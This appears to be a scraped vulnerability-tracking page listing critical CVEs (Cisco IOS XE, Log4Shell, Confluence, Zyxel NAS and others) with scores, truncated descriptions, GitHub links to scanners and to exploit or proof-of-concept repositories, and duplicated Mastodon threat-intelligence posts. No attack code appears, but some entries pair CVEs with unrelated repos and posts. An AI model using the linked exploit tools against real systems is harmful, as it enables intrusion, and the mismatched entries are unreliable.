Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. For s

Nuclei template

28 repos

https://github.com/ZephrFish/CVE-2023-20198-Checker

https://github.com/ohlawd/CVE-2023-20198

https://github.com/raystr-atearedteam/CVE-2023-20198-checker

https://github.com/securityphoenix/cisco-CVE-2023-20198-tester

https://github.com/Vulnmachines/Cisco_CVE-2023-20198

https://github.com/smokeintheshell/CVE-2023-20198

https://github.com/sohaibeb/CVE-2023-20198

https://github.com/iveresk/cve-2023-20198

https://github.com/Atea-Redteam/CVE-2023-20198

https://github.com/alekos3/CVE_2023_20198_Remediator

https://github.com/Pushkarup/CVE-2023-20198

https://github.com/W01fh4cker/CVE-2023-20198-RCE

https://github.com/Codeb3af/CVE-2023-20198-RCE

https://github.com/kacem-expereo/CVE-2023-20198

https://github.com/RevoltSecurities/CVE-2023-20198

https://github.com/reket99/Cisco_CVE-2023-20198

https://github.com/vulncheck-oss/cisco-ios-xe-implant-scanner

https://github.com/netbell/CVE-2023-20198-Fix

https://github.com/hackingyseguridad/nmap

https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner

https://github.com/Shadow0ps/CVE-2023-20198-Scanner

https://github.com/JoyGhoshs/CVE-2023-20198

https://github.com/fox-it/cisco-ios-xe-implant-detection

https://github.com/codeb0ss/CVE-2023-20198-PoC

https://github.com/alekos3/CVE_2023_20198_Detector

https://github.com/Tounsi007/CVE-2023-20198

https://github.com/IceBreakerCode/CVE-2023-20198

https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198

CVE-2024-0204
(9.8 CRITICAL)

EPSS: 53.86%

updated 2024-02-02T18:30:29

2 posts

Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.

Nuclei template

6 repos

https://github.com/adminlove520/CVE-2024-0204

https://github.com/gobysec/GobyVuls

https://github.com/cbeek-r7/CVE-2024-0204

https://github.com/gobysec/Goby

https://github.com/horizon3ai/CVE-2024-0204

https://github.com/m-cetin/CVE-2024-0204

pentesttools at 2024-04-30T11:33:10.581Z ##

Hi there! You look like someone who appreciates the finer things in . 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

pentesttools@infosec.exchange at 2024-04-30T11:33:10.000Z ##

Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

screaminggoat at 2024-04-19T18:11:00.293Z ##

MITRE disclosed that one of their research and development networks was compromised by a foreign nation-state threat actor in January 2024 using Ivanti Connect Secure zero-days CVE-2023-46805 and CVE-2024-21887. Networked Experimentation, Research, and Virtualization Environment (NERVE) is a collaborative network used for research, development, and prototyping. MITRE included a timeline, observed TTP methods (mapped out to MITRE ATT&CK techniques cc: @howelloneill) and their incident response actions. No IOC provided. 🔗 mitre.org/news-insights/news-r and medium.com/mitre-engenuity/adv h/t @reverseics

cc: @campuscodi @briankrebs

##

simontsui@infosec.exchange at 2024-04-19T18:11:00.000Z ##

MITRE disclosed that one of their research and development networks was compromised by a foreign nation-state threat actor in January 2024 using Ivanti Connect Secure zero-days CVE-2023-46805 and CVE-2024-21887. Networked Experimentation, Research, and Virtualization Environment (NERVE) is a collaborative network used for research, development, and prototyping. MITRE included a timeline, observed TTP methods (mapped out to MITRE ATT&CK techniques cc: @howelloneill) and their incident response actions. No IOC provided. 🔗 mitre.org/news-insights/news-r and medium.com/mitre-engenuity/adv h/t @reverseics

cc: @campuscodi @briankrebs

#MITRE #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #threatintel #cyberespionage

##

screaminggoat at 2024-04-19T18:11:00.293Z ##

MITRE disclosed that one of their research and development networks was compromised by a foreign nation-state threat actor in January 2024 using Ivanti Connect Secure zero-days CVE-2023-46805 and CVE-2024-21887. Networked Experimentation, Research, and Virtualization Environment (NERVE) is a collaborative network used for research, development, and prototyping. MITRE included a timeline, observed TTP methods (mapped out to MITRE ATT&CK techniques cc: @howelloneill) and their incident response actions. No IOC provided. 🔗 mitre.org/news-insights/news-r and medium.com/mitre-engenuity/adv h/t @reverseics

cc: @campuscodi @briankrebs

##

simontsui@infosec.exchange at 2024-04-19T18:11:00.000Z ##

MITRE disclosed that one of their research and development networks was compromised by a foreign nation-state threat actor in January 2024 using Ivanti Connect Secure zero-days CVE-2023-46805 and CVE-2024-21887. Networked Experimentation, Research, and Virtualization Environment (NERVE) is a collaborative network used for research, development, and prototyping. MITRE included a timeline, observed TTP methods (mapped out to MITRE ATT&CK techniques cc: @howelloneill) and their incident response actions. No IOC provided. 🔗 mitre.org/news-insights/news-r and medium.com/mitre-engenuity/adv h/t @reverseics

cc: @campuscodi @briankrebs

#MITRE #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #threatintel #cyberespionage

##

CVE-2023-22518
(9.1 CRITICAL)

EPSS: 96.63%

updated 2023-12-28T05:05:44

2 posts

All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.

Nuclei template

8 repos

https://github.com/davidfortytwo/CVE-2023-22518

https://github.com/0x0d3ad/CVE-2023-22518

https://github.com/bibo318/CVE-2023-22518

https://github.com/Lilly-dox/Exploit-CVE-2023-22518

https://github.com/C1ph3rX13/CVE-2023-22518

https://github.com/RevoltSecurities/CVE-2023-22518

https://github.com/0x00sector/CVE_2023_22518_Checker

https://github.com/ForceFledgling/CVE-2023-22518

simontsui@infosec.exchange at 2024-04-17T18:04:59.000Z ##

Cado Security Labs reports that threat actors are exploiting CVE-2023-22518 (9.8 critical, disclosed 31 October 2023 by Atlassian, in CISA KEV Catalog 07 November 2023) in Atlassian Confluence to deploy Cerber ransomware. Cado provides a technical analysis of the Linux variant of Cerber. IOC provided. 🔗 cadosecurity.com/blog/cerber-r

#cybercrime #ransomware #threatintel #IOC #cerber

##

jbhall56@infosec.exchange at 2024-04-17T13:55:46.000Z ##

The attacks leverage CVE-2023-22518 (CVSS score: 9.1), a critical security vulnerability impacting the Atlassian Confluence Data Center and Server that allows an unauthenticated attacker to reset Confluence and create an administrator account. thehackernews.com/2024/04/crit

##

CVE-2023-48365
(9.6 CRITICAL)

EPSS: 0.08%

updated 2023-12-08T05:05:23

2 posts

Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthenticated remote code execution, aka QB-21683. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application. The fixed versions are August 2023 Patch 2, May 2023 P

screaminggoat at 2024-04-26T14:59:18.789Z ##

Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot

This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:

  • CVE-2023-41266 (vendor 8.2 high/NVD 6.5 medium) path traversal, disclosed ~29 August 2023?, added to CISA KEV Catalog 07 December 2023
  • CVE-2023-41265 (vendor 9.6 critical/NVD 9.9 critical) also known as ZeroQlik ... HTTP Request Tunneling vulnerability, disclosed ~29 August 2023?, added to KEV 07 December 2023
  • CVE-2023-48365 (vendor 9.6 critical/NVD 9.9 critical) also known as DoubleQlik ... EoP and a patch bypass of CVE-2023-41265, disclosed 15 November 2023

Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.

##

screaminggoat@infosec.exchange at 2024-04-26T14:59:18.000Z ##

Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot

This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:

  • CVE-2023-41266 (vendor 8.2 high/NVD 6.5 medium) path traversal, disclosed ~29 August 2023?, added to CISA KEV Catalog 07 December 2023
  • CVE-2023-41265 (vendor 9.6 critical/NVD 9.9 critical) also known as ZeroQlik ... HTTP Request Tunneling vulnerability, disclosed ~29 August 2023?, added to KEV 07 December 2023
  • CVE-2023-48365 (vendor 9.6 critical/NVD 9.9 critical) also known as DoubleQlik ... EoP and a patch bypass of CVE-2023-41265, disclosed 15 November 2023

Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.

#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel

##

CVE-2023-4473
(9.8 CRITICAL)

EPSS: 0.07%

updated 2023-12-06T03:30:26

5 posts

A command injection vulnerability in the web server of the Zyxel NAS326 firmware version V5.21(AAZF.14)C0 and NAS542 firmware version V5.21(ABAG.11)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted URL to a vulnerable device.

screaminggoat at 2024-04-30T16:30:48.737Z ##

SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.

##

screaminggoat@infosec.exchange at 2024-04-30T16:30:48.000Z ##

SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.

#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC

##

threatcodex at 2024-04-30T17:01:54.736Z ##

Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
-2023-4473 -2023-4474
isc.sans.edu/diary/rss/30884

##

sans_isc at 2024-04-30T15:21:19.190Z ##

Another Day, Another NAS: Attacks against devices CVE-2023-4473, CVE-2023-4474 i5c.us/d30884

##

sans_isc@infosec.exchange at 2024-04-30T15:21:19.000Z ##

Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 i5c.us/d30884

##

CVE-2023-4474
(9.8 CRITICAL)

EPSS: 0.10%

updated 2023-12-06T03:30:26

5 posts

The improper neutralization of special elements in the WSGI server of the Zyxel NAS326 firmware version V5.21(AAZF.14)C0 and NAS542 firmware version V5.21(ABAG.11)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted URL to a vulnerable device.

screaminggoat at 2024-04-30T16:30:48.737Z ##

SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.

##

screaminggoat@infosec.exchange at 2024-04-30T16:30:48.000Z ##

SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.

#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC

##

threatcodex at 2024-04-30T17:01:54.736Z ##

Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
-2023-4473 -2023-4474
isc.sans.edu/diary/rss/30884

##

sans_isc at 2024-04-30T15:21:19.190Z ##

Another Day, Another NAS: Attacks against devices CVE-2023-4473, CVE-2023-4474 i5c.us/d30884

##

sans_isc@infosec.exchange at 2024-04-30T15:21:19.000Z ##

Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 i5c.us/d30884

##

CVE-2023-36396
(7.8 HIGH)

EPSS: 0.11%

updated 2023-11-14T18:30:29

2 posts

Windows Compressed Folder Remote Code Execution Vulnerability

screaminggoat at 2024-04-22T13:54:40.550Z ##

SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 safebreach.com/blog/magicdot-a

##

simontsui@infosec.exchange at 2024-04-22T13:54:40.000Z ##

SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 safebreach.com/blog/magicdot-a

#MagicDot #CVE_2023_42757 #CVE_2023_32054 #CVE_2023_36396

##

CVE-2021-44228
(10.0 CRITICAL)

EPSS: 97.56%

updated 2023-11-07T03:39:36.897000

2 posts

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is en

Nuclei template

100 repos

https://github.com/darkarnium/Log4j-CVE-Detect

https://github.com/fullhunt/log4j-scan

https://github.com/puzzlepeaches/Log4jUnifi

https://github.com/future-client/CVE-2021-44228

https://github.com/mr-vill4in/log4j-fuzzer

https://github.com/NCSC-NL/log4shell

https://github.com/corelight/cve-2021-44228

https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator

https://github.com/blake-fm/vcenter-log4j

https://github.com/momos1337/Log4j-RCE

https://github.com/mufeedvh/log4jail

https://github.com/NS-Sp4ce/Vm4J

https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept

https://github.com/wortell/log4j

https://github.com/roxas-tan/CVE-2021-44228

https://github.com/kubearmor/log4j-CVE-2021-44228

https://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell

https://github.com/DragonSurvivalEU/RCE

https://github.com/Diverto/nse-log4shell

https://github.com/yahoo/check-log4j

https://github.com/0xDexter0us/Log4J-Scanner

https://github.com/CrackerCat/CVE-2021-44228-Log4j-Payloads

https://github.com/HynekPetrak/log4shell-finder

https://github.com/AlexandreHeroux/Fix-CVE-2021-44228

https://github.com/irgoncalves/f5-waf-quick-patch-cve-2021-44228

https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs

https://github.com/toramanemre/log4j-rce-detect-waf-bypass

https://github.com/alexandre-lavoie/python-log4rce

https://github.com/alexbakker/log4shell-tools

https://github.com/kozmer/log4j-shell-poc

https://github.com/Adikso/minecraft-log4j-honeypot

https://github.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228

https://github.com/jas502n/Log4j2-CVE-2021-44228

https://github.com/Jeromeyoung/log4j2burpscanner

https://github.com/claranet/ansible-role-log4shell

https://github.com/KosmX/CVE-2021-44228-example

https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes

https://github.com/CERTCC/CVE-2021-44228_scanner

https://github.com/nu11secur1ty/CVE-2021-44228-VULN-APP

https://github.com/logpresso/CVE-2021-44228-Scanner

https://github.com/mzlogin/CVE-2021-44228-Demo

https://github.com/takito1812/log4j-detect

https://github.com/dtact/divd-2021-00038--log4j-scanner

https://github.com/MalwareTech/Log4jTools

https://github.com/1lann/log4shelldetect

https://github.com/qingtengyun/cve-2021-44228-qingteng-patch

https://github.com/thomaspatzke/Log4Pot

https://github.com/bigsizeme/Log4j-check

https://github.com/BinaryDefense/log4j-honeypot-flask

https://github.com/f0ng/log4j2burpscanner

https://github.com/julian911015/Log4j-Scanner-Exploit

https://github.com/hackinghippo/log4shell_ioc_ips

https://github.com/leonjza/log4jpwn

https://github.com/mr-r3b00t/CVE-2021-44228

https://github.com/corretto/hotpatch-for-apache-log4j2

https://github.com/Nanitor/log4fix

https://github.com/twseptian/spring-boot-log4j-cve-2021-44228-docker-lab

https://github.com/sassoftware/loguccino

https://github.com/christophetd/log4shell-vulnerable-app

https://github.com/aws-samples/kubernetes-log4j-cve-2021-44228-node-agent

https://github.com/0xInfection/LogMePwn

https://github.com/rubo77/log4j_checker_beta

https://github.com/marcourbano/CVE-2021-44228

https://github.com/thecyberneh/Log4j-RCE-Exploiter

https://github.com/pedrohavay/exploit-CVE-2021-44228

https://github.com/nccgroup/log4j-jndi-be-gone

https://github.com/CreeperHost/Log4jPatcher

https://github.com/cyberxml/log4j-poc

https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

https://github.com/lucab85/log4j-cve-2021-44228

https://github.com/phoswald/sample-ldap-exploit

https://github.com/tippexs/nginx-njs-waf-cve2021-44228

https://github.com/dwisiswant0/look4jar

https://github.com/NorthwaveSecurity/log4jcheck

https://github.com/boundaryx/cloudrasp-log4j2

https://github.com/redhuntlabs/Log4JHunt

https://github.com/puzzlepeaches/Log4jCenter

https://github.com/mergebase/log4j-detector

https://github.com/JagarYousef/log4j-dork-scanner

https://github.com/ssl/scan4log4j

https://github.com/fox-it/log4j-finder

https://github.com/simonis/Log4jPatch

https://github.com/infiniroot/nginx-mitigate-log4shell

https://github.com/lfama/log4j_checker

https://github.com/back2root/log4shell-rex

https://github.com/giterlizzi/nmap-log4shell

https://github.com/irgoncalves/f5-waf-enforce-sig-CVE-2021-44228

https://github.com/CodeShield-Security/Log4JShell-Bytecode-Detector

https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit

https://github.com/stripe/log4j-remediation-tools

https://github.com/fireeye/CVE-2021-44228

https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch

https://github.com/justakazh/Log4j-CVE-2021-44228

https://github.com/LiveOverflow/log4shell

https://github.com/0xst4n/CVE-2021-44228-poc

https://github.com/cisagov/log4j-scanner

https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words

https://github.com/greymd/CVE-2021-44228

https://github.com/puzzlepeaches/Log4jHorizon

https://github.com/Azeemering/CVE-2021-44228-DFIR-Notes

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

CVE-2023-3094
(6.3 MEDIUM)

EPSS: 0.06%

updated 2023-11-06T05:04:16

2 posts

A vulnerability classified as critical has been found in code-projects Agro-School Management System 1.0. Affected is the function doUpdateQuestion of the file btn_functions.php. The manipulation of the argument question_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-230670 is the identifier assigned to thi

3 repos

https://github.com/RubyCat1337/CVE-2023-30943

https://github.com/Chocapikk/CVE-2023-30943

https://github.com/d0rb/CVE-2023-30943

screaminggoat at 2024-04-24T11:05:31.184Z ##

Kaspersky, not content with only the technical analysis of the XZ Utils backdoor, covers the social engineering techniques and timeline of the threat actor who used the alias Jia Tan. 🔗 securelist.com/xz-backdoor-sto See related Kaspersky technical analysis securelist.com/xz-backdoor-sto

##

screaminggoat@infosec.exchange at 2024-04-24T11:05:31.000Z ##

Kaspersky, not content with only the technical analysis of the XZ Utils backdoor, covers the social engineering techniques and timeline of the threat actor who used the alias Jia Tan. 🔗 securelist.com/xz-backdoor-sto See related Kaspersky technical analysis securelist.com/xz-backdoor-sto

#CVE_2023_3094 #xz #xzbackdoor #supplychainattack #JiaTan

##

SophosXOps at 2024-04-18T22:36:40.218Z ##

More concerning still, our investigators found evidence that a similar chain of movements has also been used against an earlier TeamCity authentication-bypass vulnerability – CVE-2023-42793, disclosed and patched in September 2023. That CVE affected on-prem versions prior to 2023.05.4; the company released a patch in that version, and also offered a plug-in for users of older versions of the product. (As a reminder, TeamCity’s latest version is 2024.03; among the many new features is automatic download of critical security updates, though an admin will still need to approve installation.)

##

SophosXOps@infosec.exchange at 2024-04-18T22:36:40.000Z ##

More concerning still, our investigators found evidence that a similar chain of movements has also been used against an earlier TeamCity authentication-bypass vulnerability – CVE-2023-42793, disclosed and patched in September 2023. That CVE affected on-prem versions prior to 2023.05.4; the company released a patch in that version, and also offered a plug-in for users of older versions of the product. (As a reminder, TeamCity’s latest version is 2024.03; among the many new features is automatic download of critical security updates, though an admin will still need to approve installation.)

##

CVE-2022-3602
(9.8 CRITICAL)

EPSS: 6.08%

updated 2023-08-17T05:02:52

4 posts

A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious ema

12 repos

https://github.com/hi-artem/find-spooky-prismacloud

https://github.com/eatscrayon/CVE-2022-3602-poc

https://github.com/corelight/CVE-2022-3602

https://github.com/NCSC-NL/OpenSSL-2022

https://github.com/cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786

https://github.com/micr0sh0ft/certscare-openssl3-exploit

https://github.com/attilaszia/cve-2022-3602

https://github.com/Qualys/osslscanwin

https://github.com/colmmacc/CVE-2022-3602

https://github.com/alicangnll/SpookySSL-Scanner

https://github.com/fox-it/spookyssl-pcaps

https://github.com/rbowes-r7/cve-2022-3602-and-cve-2022-3786-openssl-poc

technotenshi at 2024-04-18T17:07:54.081Z ##

🔍 Why did CVE-2022-3602 evade fuzz testing? A deep dive into OpenSSL's fuzzing fails: The punycode parser slipped through due to specific harness limitations & lack of corpus coverage. A call for enhanced fuzzing strategies! allsoftwaresucks.blogspot.com/

##

hnbot@chrispelli.fun at 2024-04-18T14:49:32.000Z ##

Why CVE-2022-3602 was not detected by fuzz testing - allsoftwaresucks.blogspot.com/

#hackernews

##

technewz_bot@mastodon.metawarrior.army at 2024-04-18T14:46:49.000Z ##

Why CVE-2022-3602 was not detected by fuzz testing
allsoftwaresucks.blogspot.com/
posted by #technewz_bot #tech #news

##

technewz_bot@mastodon.metawarrior.army at 2024-04-18T14:46:49.000Z ##

Why CVE-2022-3602 was not detected by fuzz testing
allsoftwaresucks.blogspot.com/
posted by #technewz_bot #tech #news

##

CVE-2023-1389
(8.8 HIGH)

EPSS: 6.88%

updated 2023-08-11T15:30:44

3 posts

TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would

2 repos

https://github.com/Terminal1337/CVE-2023-1389

https://github.com/Voyag3r-Security/CVE-2023-1389

screaminggoat at 2024-04-21T00:43:23.978Z ##

@hrbrmstr Oh the Tuesday blog post. Here's a direct link to Fortinet's: fortinet.com/blog/threat-resea

##

simontsui@infosec.exchange at 2024-04-21T00:43:23.000Z ##

@hrbrmstr Oh the Tuesday blog post. Here's a direct link to Fortinet's: fortinet.com/blog/threat-resea

##

jbhall56@infosec.exchange at 2024-04-18T10:56:32.000Z ##

There already is a patch for the flaw, tracked as CVE-2023-1389, found in the Web management interface of the TP-Link Archer AX21 (AX1800) Wi-Fi router and affecting devices Version 1.1.4 Build 20230219 or prior. darkreading.com/ics-ot-securit

##

CVE-2023-24932
(6.7 MEDIUM)

EPSS: 13.87%

updated 2023-05-15T18:18:30.897000

2 posts

Secure Boot Security Feature Bypass Vulnerability

1 repos

https://github.com/Wack0/CVE-2022-21894

dw at 2024-04-25T14:07:59.950Z ##

At some point recently Microsoft updated their Baton Drop guidance to indicate that instead of playing DBX bootloader whack-a-mole they are revoking the Secure Boot "Windows Production PCA 2011" (first-party) cert. This will be enforced "at least six months after the Deployment phase", which is scheduled for July 2024 "or later".

All hail "Windows UEFI CA 2023" which surely won't have any of these issues ever again.

@Rairii called it in Feb with analysis of securebootai.dll

support.microsoft.com/en-us/to

##

dw@infosec.exchange at 2024-04-25T14:07:59.000Z ##

At some point recently Microsoft updated their Baton Drop guidance to indicate that instead of playing DBX bootloader whack-a-mole they are revoking the Secure Boot "Windows Production PCA 2011" (first-party) cert. This will be enforced "at least six months after the Deployment phase", which is scheduled for July 2024 "or later".

All hail "Windows UEFI CA 2023" which surely won't have any of these issues ever again.

@Rairii called it in Feb with analysis of securebootai.dll

support.microsoft.com/en-us/to

##

CVE-2023-21746
(7.8 HIGH)

EPSS: 0.04%

updated 2023-05-06T05:00:40

2 posts

Windows NTLM Elevation of Privilege Vulnerability.

1 repos

https://github.com/Muhammad-Ali007/LocalPotato_CVE-2023-21746

oversecurity@mastodon.social at 2024-04-29T16:12:06.000Z ##

LocalPotato HTTP edition

Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP...

🔗️ [Decoder] link.is.it/ikv1ph

##

oversecurity@mastodon.social at 2024-04-29T16:12:06.000Z ##

LocalPotato HTTP edition

Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP...

🔗️ [Decoder] link.is.it/ikv1ph

##

CVE-2022-37955
(7.8 HIGH)

EPSS: 0.06%

updated 2023-04-19T05:08:54

2 posts

Windows Group Policy Elevation of Privilege Vulnerability.

oversecurity@mastodon.social at 2024-04-29T16:11:14.000Z ##

EoP via Arbitrary File Write/Overwite in Group Policy Client “gpsvc” – CVE-2022-37955

Summary A standard domain user can exploit Arbitrary File Write/Overwrite with NT AUTHORITY\SYSTEM under certain circumstances if Group Policy...

🔗️ [Decoder] link.is.it/wewm9y

##

oversecurity@mastodon.social at 2024-04-29T16:11:14.000Z ##

EoP via Arbitrary File Write/Overwite in Group Policy Client “gpsvc” – CVE-2022-37955

Summary A standard domain user can exploit Arbitrary File Write/Overwrite with NT AUTHORITY\SYSTEM under certain circumstances if Group Policy...

🔗️ [Decoder] link.is.it/wewm9y

##

CVE-2023-21036
(5.5 MEDIUM)

EPSS: 0.04%

updated 2023-04-06T05:08:38

1 posts

In BitmapExport.java, there is a possible failure to truncate images due to a logic error in the code.Product: AndroidVersions: Android kernelAndroid ID: A-264261868References: N/A

6 repos

https://github.com/L1-0/codestuff

https://github.com/qixils/AntiCropalypse

https://github.com/infobyte/CVE-2023-21036

https://github.com/lordofpipes/acropadetect

https://github.com/notaSWE/gocropalypse

https://github.com/frankthetank-music/Acropalypse-Multi-Tool

